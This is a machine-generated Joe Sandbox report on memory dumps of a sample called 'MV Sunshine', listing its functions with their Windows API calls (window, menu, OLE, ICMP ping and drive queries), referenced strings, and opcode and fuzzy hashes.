Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 327f7aed521c79fa04d3ee8c8460044237c6ef537b2122fe9d81a409252e6934
Instruction ID: 77ff5c52580631bcc440107842ed08e56e8e49e741daa4e3b711d1783c858c13
Opcode Fuzzy Hash: 327f7aed521c79fa04d3ee8c8460044237c6ef537b2122fe9d81a409252e6934
Instruction Fuzzy Hash: 64514371B00205AFDB18DFA9DD95AAEBBB6EB89310F14812DF51AD7290D770AD40CB50

Function 0062201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00621B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00622036,?,00000000,?,?,?,?,006216CB,00000000,?), ref: 00621B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006220D3
KillTimer.USER32(-00000001,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0062216E
DestroyAcceleratorTable.USER32(00000000), ref: 0065BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BF5A
DeleteObject.GDI32(00000000), ref: 0065BF6C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 481596c54a14de722e3122a30671dd1365cc60e43ffd60954ea1fb808521aec9
Instruction ID: fa91d6223c61a66cfba790ea2a61f96bc3a644b55f6c3b528712729ae26019ae
Opcode Fuzzy Hash: 481596c54a14de722e3122a30671dd1365cc60e43ffd60954ea1fb808521aec9
Instruction Fuzzy Hash: E4618E31100B62EFCB35AF14ED98B6AB7F3FB51312F10652CE9824A660C771A895DF91

Function 006221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

GetSysColor.USER32(0000000F), ref: 006221D3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 49bf167dd7ddd5ebf515dd3017abc48472d04863c2e6dc1395b3066b1b7a84db
Instruction ID: 87b76028228e84de4c480eb0228e2b9c79b542de9b3b54992cb39d7ad9692867
Opcode Fuzzy Hash: 49bf167dd7ddd5ebf515dd3017abc48472d04863c2e6dc1395b3066b1b7a84db
Instruction Fuzzy Hash: 8F41A131001A51EEDB255F68EC98BB93B67EB06331F144365FD659A2E2C7328D42DF22

Function 0068AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,006AF910), ref: 0068AB76
GetDriveTypeW.KERNEL32(00000061,006DA620,00000061), ref: 0068AC40
_wcscpy.LIBCMT ref: 0068AC6A

Strings

fixed, xrefs: 0068ABBE
network, xrefs: 0068ABD4
cdrom, xrefs: 0068AB92
removable, xrefs: 0068ABA8
all, xrefs: 0068AB7C
ramdisk, xrefs: 0068ABEA
unknown, xrefs: 0068AC01

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: ee5438ece205991e730e812f18de252db446abb32e0b2948304b631ab13dfdca
Instruction ID: 807f813daefea903b2ef00283d9697fe314b7e6f658628fca47777f4d128845d
Opcode Fuzzy Hash: ee5438ece205991e730e812f18de252db446abb32e0b2948304b631ab13dfdca
Instruction Fuzzy Hash: AD51B0305083119BD750FF94D891EAAB7A7EF84300F14492EF986972A2DB31DD0ACB53

Function 006AC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

Part of subcall function 00622344: GetCursorPos.USER32(?), ref: 00622357
Part of subcall function 00622344: ScreenToClient.USER32(006E67B0,?), ref: 00622374
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000001), ref: 00622399
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000002), ref: 006223A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 006AC2E4
ImageList_EndDrag.COMCTL32 ref: 006AC2EA
ReleaseCapture.USER32 ref: 006AC2F0
SetWindowTextW.USER32(?,00000000), ref: 006AC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006AC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 006AC48F

Strings

prn, xrefs: 006AC3FD
prn, xrefs: 006AC438
@GUI_DRAGFILE, xrefs: 006AC424
@GUI_DROPID, xrefs: 006AC3E1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$prn$prn
API String ID: 1924731296-1112027532
Opcode ID: 230b17a0d14459e0c5086b78fd6e610ed21ed043ec9e1c0ec785f942161f6290
Instruction ID: 25b932ad10b0b7294cf6fe650742a79590f4134801bfe0bdd952afeebec85b3d
Opcode Fuzzy Hash: 230b17a0d14459e0c5086b78fd6e610ed21ed043ec9e1c0ec785f942161f6290
Instruction Fuzzy Hash: 1F51AB70204304AFDB10EF24DC96FAA7BE6EB99310F00452DF5918B2E1CB70A948DF66

Function 00629997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 006299C2
__swprintf.LIBCMT ref: 00629A0C
__i64tow.LIBCMT ref: 0065FA0F

Strings

True, xrefs: 0065F9D0
%.15g, xrefs: 00629A06
False, xrefs: 0065F9D7
0x%p, xrefs: 0065F9F1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: c8d572f5bb59327189ec1df1c7d51548609c10e0df93ec6a36f426c5012c2fac
Instruction ID: 03334493aeaaf74a88d8e5dc76f0963eb600693aec3fe9d5ad9daa934fdbf616
Opcode Fuzzy Hash: c8d572f5bb59327189ec1df1c7d51548609c10e0df93ec6a36f426c5012c2fac
Instruction Fuzzy Hash: 70412671904A15AFDB24EB38E842E7673EBEF48310F24446FE949D7381EA319846CB11

Function 006A73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A73D9
CreateMenu.USER32 ref: 006A73F4
SetMenu.USER32(?,00000000), ref: 006A7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006A7490
IsMenu.USER32(?), ref: 006A74A6
CreatePopupMenu.USER32 ref: 006A74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006A74DD
DrawMenuBar.USER32 ref: 006A74E5

Strings

F, xrefs: 006A74D1
0, xrefs: 006A73CF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 1b06e005db065580d59cb5fd81d3f342b4e55b5f732ade61620cdaaca6a47dc1
Instruction ID: 0e6fdfae757e37fc32ec1fa535b9e02d20b3b1cc37dddf25bc426a8cecba0266
Opcode Fuzzy Hash: 1b06e005db065580d59cb5fd81d3f342b4e55b5f732ade61620cdaaca6a47dc1
Instruction Fuzzy Hash: D7412274A00209EFDB20EFA4D984A9ABBFAFF5A340F144428E95597360D731AD10CF60

Function 006A772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006A77CD
CreateCompatibleDC.GDI32(00000000), ref: 006A77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006A77E7
SelectObject.GDI32(00000000,00000000), ref: 006A77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 006A77FA
DeleteDC.GDI32(00000000), ref: 006A7803
GetWindowLongW.USER32(?,000000EC), ref: 006A780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006A7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006A782D

Strings

static, xrefs: 006A7765

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f87e8e44a030b5b8381b7106f2e95a3438b1e757cdd368e1fc7c811094bc1fee
Instruction ID: 6df8800d0d8e67f3ece4a44764a97a4f5d738d3d7796a6c7be8b447524a3b560
Opcode Fuzzy Hash: f87e8e44a030b5b8381b7106f2e95a3438b1e757cdd368e1fc7c811094bc1fee
Instruction Fuzzy Hash: D9316A32105215ABDF11AFA4DC09FDB3B6AEF0A321F111224FA55A61A0C775EC21DFA5

Function 00647040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064707B

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

__gmtime64_s.LIBCMT ref: 00647114
__gmtime64_s.LIBCMT ref: 0064714A
__gmtime64_s.LIBCMT ref: 00647167
__allrem.LIBCMT ref: 006471BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006471D9
__allrem.LIBCMT ref: 006471F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0064720E
__allrem.LIBCMT ref: 00647225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00647243
__invoke_watson.LIBCMT ref: 006472B4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: ea4b9f906cfef822598968d03410cf81a4b1e6d513d7f793be4e5f4a03023a14
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 977128B1A04717ABD7149E79CC41B9BB3AAAF10764F14423EF814E7381E770EB448794

Function 00682A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682A31
GetMenuItemInfoW.USER32(006E6890,000000FF,00000000,00000030), ref: 00682A92
SetMenuItemInfoW.USER32(006E6890,00000004,00000000,00000030), ref: 00682AC8
Sleep.KERNEL32(000001F4), ref: 00682ADA
GetMenuItemCount.USER32(?), ref: 00682B1E
GetMenuItemID.USER32(?,00000000), ref: 00682B3A
GetMenuItemID.USER32(?,-00000001), ref: 00682B64
GetMenuItemID.USER32(?,?), ref: 00682BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00682BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00682C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00682C24

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b6f1f06656b568e85566c97f76b979158991df671111d7c7361f54f9284f4d83
Instruction ID: bf85070a72e671ca34496d3c7dc30640240ccf88183d067760a546211853756c
Opcode Fuzzy Hash: b6f1f06656b568e85566c97f76b979158991df671111d7c7361f54f9284f4d83
Instruction Fuzzy Hash: 3461B0B090124AAFDB21EFA4C8A8DFE7BBAFF11308F140659F84197251D731AD46DB21

Function 006A7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006A7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006A7217
GetWindowLongW.USER32(?,000000F0), ref: 006A723B
_memset.LIBCMT ref: 006A724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006A72D6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 33ab92a2cfd4e7d18ec690bac069db42d38c85e282120792ac9d5e851966978f
Instruction ID: 052f31dba630f21f2260b092cd2482f843c573bac29fc43fdf0740af2aa56635
Opcode Fuzzy Hash: 33ab92a2cfd4e7d18ec690bac069db42d38c85e282120792ac9d5e851966978f
Instruction Fuzzy Hash: 8D616C71900248AFDB10EFA4CC81EEE77FAAB0A710F144159FA15AB3A1D770AD45DF64

Function 0067710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00677135
SafeArrayAllocData.OLEAUT32(?), ref: 0067718E
VariantInit.OLEAUT32(?), ref: 006771A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 006771C0
VariantCopy.OLEAUT32(?,?), ref: 00677213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00677227
VariantClear.OLEAUT32(?), ref: 0067723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00677249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00677252
VariantClear.OLEAUT32(?), ref: 00677264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0067726F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 87f618a1154c17d70b3d864c0f6127e7f3517f96095b5e20b7321fcb6fad43e5
Instruction ID: bce6d2c45ee2cd9d97e074d8366a3dfecc9480d73ef2c874d28d6d4174d79b0c
Opcode Fuzzy Hash: 87f618a1154c17d70b3d864c0f6127e7f3517f96095b5e20b7321fcb6fad43e5
Instruction Fuzzy Hash: A0414235A042199FCB00EFA4D8449AEBBFAFF48354F00C069F955E7262DB30AA45CF91

Function 006986D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

CoInitialize.OLE32 ref: 00698718
CoUninitialize.OLE32 ref: 00698723
CoCreateInstance.OLE32(?,00000000,00000017,006B2BEC,?), ref: 00698783
IIDFromString.OLE32(?,?), ref: 006987F6
VariantInit.OLEAUT32(?), ref: 00698890
VariantClear.OLEAUT32(?), ref: 006988F1

Strings

Failed to create object, xrefs: 0069878E, 00698844
Invalid parameter, xrefs: 0069880F
NULL Pointer assignment, xrefs: 006987C8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 3e8b091b28f6cac2efd50569d672db840fc14707b8b7ee0c00d961479c45ae44
Instruction ID: 1f79698e57bd013acc81306edb6ce38c8e890a99572c72f37f8a7bc148653a39
Opcode Fuzzy Hash: 3e8b091b28f6cac2efd50569d672db840fc14707b8b7ee0c00d961479c45ae44
Instruction Fuzzy Hash: BC61E1706087119FDB10DF64C944B6EB7EAAF8A714F10481DF8859B791CB30ED44CBA6

Function 00695A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00695AA6
inet_addr.WSOCK32(?,?,?), ref: 00695AEB
gethostbyname.WSOCK32(?), ref: 00695AF7
IcmpCreateFile.IPHLPAPI ref: 00695B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00695B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00695B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00695C00
WSACleanup.WSOCK32 ref: 00695C06

Strings

Ping, xrefs: 00695B29

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8289bcf96f1585da2866e4b37446198339b33eca8a73300c9a847e84f3223dbb
Instruction ID: 8b743bffe6ef708dc5b8d88d3d11e4d4d7ad6695955d00f460fd34d8ce1ae4ca
Opcode Fuzzy Hash: 8289bcf96f1585da2866e4b37446198339b33eca8a73300c9a847e84f3223dbb
Instruction Fuzzy Hash: 3F519E31604B109FDB21AF24DC55B6AB7EAEF48310F04892AF956DB2A1DB70EC01CF56

Function 0068B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0068B7B1
GetLastError.KERNEL32 ref: 0068B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0068B828

Strings

READONLY, xrefs: 0068B7F3
NOTREADY, xrefs: 0068B7E7
INVALID, xrefs: 0068B7FA
READY, xrefs: 0068B801
UNKNOWN, xrefs: 0068B7E0

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0fc4fc2688605bf60fa37e9d4a4db5a09b67504ee1c7203ec7b347e982e85f6f
Instruction ID: 9f2d78a97057807122563fec88190a8a6ed491dfb008080f176f256bea6e8317
Opcode Fuzzy Hash: 0fc4fc2688605bf60fa37e9d4a4db5a09b67504ee1c7203ec7b347e982e85f6f
Instruction Fuzzy Hash: C6319235A002059FDB10FFA4D885AFE7BBAEF85700F14912AF902D7391DB71A946CB51

Function 00679471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006794F6
GetDlgCtrlID.USER32 ref: 00679501
GetParent.USER32 ref: 0067951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00679520
GetDlgCtrlID.USER32(?), ref: 00679529
GetParent.USER32(?), ref: 00679545
